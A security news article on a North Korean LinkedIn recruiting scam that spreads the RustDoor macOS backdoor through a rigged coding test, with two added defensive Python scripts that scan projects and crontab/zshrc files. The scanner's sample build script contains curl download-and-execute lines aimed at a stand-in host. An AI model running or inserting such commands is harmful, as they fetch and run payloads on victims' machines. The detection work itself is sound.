Cybersecurity researchers continue to warn of attempts by North Korean actors to target potential victims on LinkedIn to spread malware called RustDoor.
The latest advisory comes from Jamf Threat Labs, which said it spotted an attempted attack in which a user was contacted on the professional social network pretending to be a recruiter for a legitimate decentralized cryptocurrency exchange (DEX) called STON.fi.
This malicious cyber activity is part of a multi-pronged campaign launched by cyber threat actors backed by the Democratic People’s Republic of Korea (DPRK) to infiltrate networks of interest under the guise of conducting interviews or completing coding tasks.
The financial and cryptocurrency industries are among the primary targets of state-sponsored adversaries seeking to generate illicit revenue and achieve an ever-changing set of goals based on regime interests.
These attacks manifest as “highly personalized and hard-to-detect social engineering campaigns” targeting employees of decentralized finance (“DeFi”), cryptocurrency, and similar businesses, as the U.S. Federal Bureau of Investigation (FBI) recently highlighted in an advisory.
One notable indicator of North Korean social engineering activity is a request to execute code or download applications on company-owned devices, or on devices with access to a company’s internal network.
Another aspect worth mentioning is that such attacks also involve “requests to run a ‘pre-employment test’ or debugging exercise that involves running non-standard or unknown Node.js packages, PyPI packages, scripts, or GitHub repositories.”
Examples of such tactics have been widely documented in recent weeks, highlighting a persistent evolution of the tools used in these campaigns against targets.
The latest attack chain detected by Jamf involves tricking the victim into downloading a booby-trapped Visual Studio project as part of a supposed coding challenge; the project embeds bash commands that download two different second-stage payloads (“VisualStudioHelper” and “zsh_env”) with identical functionality.
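The article describes a project file that carries embedded bash commands to fetch a second stage. A defender reviewing a coding challenge before running it can grep such a project for download-and-execute one-liners. The scanner below is an added example and not Jamf's tooling; the detection rules, the hypothetical `example.invalid` URL and the two sample files are constructed for illustration, and the patterns aim for recall during manual review rather than serving as a blocklist.

```python
"""Scan project files for embedded shell download-and-execute one-liners.

Added example (not from Jamf or the article). The rules and sample files are
constructed; they flag common "fetch a payload, then run it" shapes so a reviewer
can inspect a received coding challenge before building it.
"""
import re
from pathlib import Path

# (rule name, compiled regex). Each rule targets one fetch-and-run idiom.
RULES = [
    # curl/wget output piped straight into a shell interpreter
    ("fetch_piped_to_shell",
     re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba|z)?sh\b")),
    # curl/wget followed by chmod +x, a shell, or ./<file> in the same command line
    ("fetch_then_execute",
     re.compile(r"\b(curl|wget)\b[^\n;&]*(;|&&)\s*(chmod\s+\+x|(ba|z)?sh\b|\./)")),
    # base64-decoded blob handed to a shell
    ("base64_decoded_to_shell",
     re.compile(r"base64\s+(-d|--decode)[^\n|]*\|\s*(ba|z)?sh\b")),
    # dotfile-hidden script paths under /tmp or the home directory
    ("hidden_script_path",
     re.compile(r"/tmp/\.[\w-]+|~/\.[\w-]+/[\w.-]+\.(sh|zsh|py)\b")),
]

# File types worth scanning inside a received project (constructed list).
SCAN_SUFFIXES = (".sh", ".json", ".xml", ".csproj", ".pbxproj", ".yml", ".yaml", ".txt")


def scan_text(text: str) -> list[tuple[str, int, str]]:
    """Return (rule_name, line_number, stripped_line) for every matching line."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, rx in RULES:
            if rx.search(line):
                hits.append((name, lineno, line.strip()))
    return hits


def scan_directory(root: Path) -> dict[str, list[tuple[str, int, str]]]:
    """Scan every file under root with a suffix in SCAN_SUFFIXES; map path -> hits."""
    results = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                results[str(path)] = hits
    return results


# Constructed sample: a "build helper" that fetches and runs a hidden binary.
SAMPLE_BUILD_SCRIPT = """\
#!/bin/bash
echo "Preparing coding challenge..."
curl -s https://example.invalid/stage2 -o /tmp/.vsh && chmod +x /tmp/.vsh && /tmp/.vsh
curl -fsSL https://example.invalid/setup.sh | bash
echo "done"
"""

# Constructed sample: an ordinary package.json with nothing suspicious.
SAMPLE_BENIGN = """\
{
  "scripts": {
    "build": "tsc -p .",
    "test": "jest"
  }
}
"""

if __name__ == "__main__":
    for rule, lineno, line in scan_text(SAMPLE_BUILD_SCRIPT):
        print(f"line {lineno}: {rule}: {line}")
    print("benign hits:", scan_text(SAMPLE_BENIGN))
```

Run it against an unpacked project with `scan_directory(Path("challenge"))`; anything it flags is a reason to read the build steps by hand before opening the project in an IDE, since many IDEs execute build hooks automatically.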
This second-stage malware is RustDoor, which the company tracks under the name Thiefbucket. At the time of writing, no anti-malware engine has flagged the zipped coding test file as malicious; it was uploaded to the VirusTotal platform on August 7, 2024.
“Configuration files embedded in the two separate malware samples show that VisualStudioHelper will persist via cron while zsh_env will persist via the zshrc file,” said researchers Jaron Bradley and Ferdous Saljooki.
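Since the two payloads persist through the user's crontab and the zshrc file, those are the first two places to audit on a developer Mac after a suspicious "coding test". The checks below are an added example and not Jamf's code; the heuristics, the sample crontab and zshrc contents, and the paths in them are constructed. The checks look for the shape of the persistence the article reports (a command launched from a hidden directory, backgrounded, or fetching content) rather than for any specific indicator.

```python
"""Audit a user's crontab and ~/.zshrc for persistence-style entries.

Added example (not Jamf's tooling). Heuristics and sample inputs are
constructed; a real audit reads `crontab -l` output and ~/.zshrc.
"""
import re
from dataclasses import dataclass, field

# Commands run from temp or dotfile-hidden directories are unusual for legitimate cron jobs.
HIDDEN_OR_TEMP_PATH = re.compile(
    r"(/tmp/|/var/tmp/|/Users/Shared/|(\$HOME|~|/Users/[^/\s]+)/\.[^/\s]+/)")
# A shell rc file that launches something in the background on every new shell.
BACKGROUNDED = re.compile(r"\bnohup\b|&\s*$")
# Network fetch or dynamic evaluation inside a startup file.
FETCH_OR_EVAL = re.compile(r"\b(curl|wget|eval|base64)\b")


@dataclass
class Finding:
    line_number: int
    line: str
    reasons: list[str] = field(default_factory=list)


def _reasons_for(command: str) -> list[str]:
    """Collect every heuristic that fires on one command string."""
    reasons = []
    if HIDDEN_OR_TEMP_PATH.search(command):
        reasons.append("hidden_or_temp_path")
    if BACKGROUNDED.search(command):
        reasons.append("backgrounded")
    if FETCH_OR_EVAL.search(command):
        reasons.append("fetch_or_eval")
    return reasons


def audit_crontab(text: str) -> list[Finding]:
    """Parse crontab text; return findings for entries whose command looks suspicious."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                 # @reboot, @hourly, ...
            parts = line.split(None, 1)
            command = parts[1] if len(parts) == 2 else ""
        else:
            parts = line.split(None, 5)          # 5 schedule fields + command
            if len(parts) < 6:
                continue                         # env assignment or malformed line
            command = parts[5]
        reasons = _reasons_for(command)
        if reasons:
            findings.append(Finding(lineno, line, reasons))
    return findings


def audit_zshrc(text: str) -> list[Finding]:
    """Flag rc-file lines that both touch a hidden/temp path and run or fetch something."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = _reasons_for(line)
        # Require a hidden/temp path plus an execution-style signal to cut noise
        # from ordinary PATH exports and aliases.
        if "hidden_or_temp_path" in reasons and len(reasons) > 1:
            findings.append(Finding(lineno, line, reasons))
    return findings


# Constructed sample crontab: one ordinary backup job and one hidden-path launcher.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 9 * * 1 /usr/local/bin/backup.sh
*/5 * * * * /Users/dev/.config/.vsh/VisualStudioHelper >/dev/null 2>&1
"""

# Constructed sample ~/.zshrc: normal PATH/alias lines plus a backgrounded launcher.
SAMPLE_ZSHRC = """\
export PATH="$HOME/bin:$PATH"
alias ll='ls -la'
nohup "$HOME/.zsh_env/zsh_env" >/dev/null 2>&1 &
"""

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB) + audit_zshrc(SAMPLE_ZSHRC):
        print(f"line {f.line_number}: {', '.join(f.reasons)}: {f.line}")
```

For a live check, feed `audit_crontab` the output of `crontab -l` and `audit_zshrc` the contents of `~/.zshrc`; each finding names the heuristics that fired so an analyst can triage the line rather than trust a single score.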
RustDoor, a macOS backdoor, was first documented by Bitdefender in February 2024 as part of a malware campaign targeting cryptocurrency companies. A subsequent analysis by S2W discovered a Golang variant called GateDoor, intended to infect Windows machines.
Jamf’s findings are significant not only because they mark the first time the malware has been formally attributed to North Korean threat actors, but also because the malware is written in Objective-C.
“The tactics and techniques used (in the campaign) are very closely aligned with what the FBI and many others in the industry are seeing,” Jaron Bradley, director of Jamf Threat Labs, told The Hacker News.
“Many of the targets, techniques and objectives of the attack discussed closely align with other cyber activities originating from the DPRK over the past two years (Operation Dream Job, RustBucket).”
VisualStudioHelper is also designed to act as an information stealer, harvesting files specified in its configuration, but only after prompting the user for their system password, with the prompt disguised as coming from the Visual Studio application to avoid arousing suspicion.
Both payloads, however, also operate as backdoors and use two different servers for command-and-control (C2) communications.
“Malicious actors continue to remain vigilant to find new ways to pursue crypto industry players,” the researchers said. “It is important to train your employees, including your developers, not to trust those who go online and ask users to run software of any type.
“These social engineering projects implemented by the DPRK come from people who have a good command of English and who enter into the conversation after having studied their target well.”
(The story was updated after publication to include additional responses from Jamf.)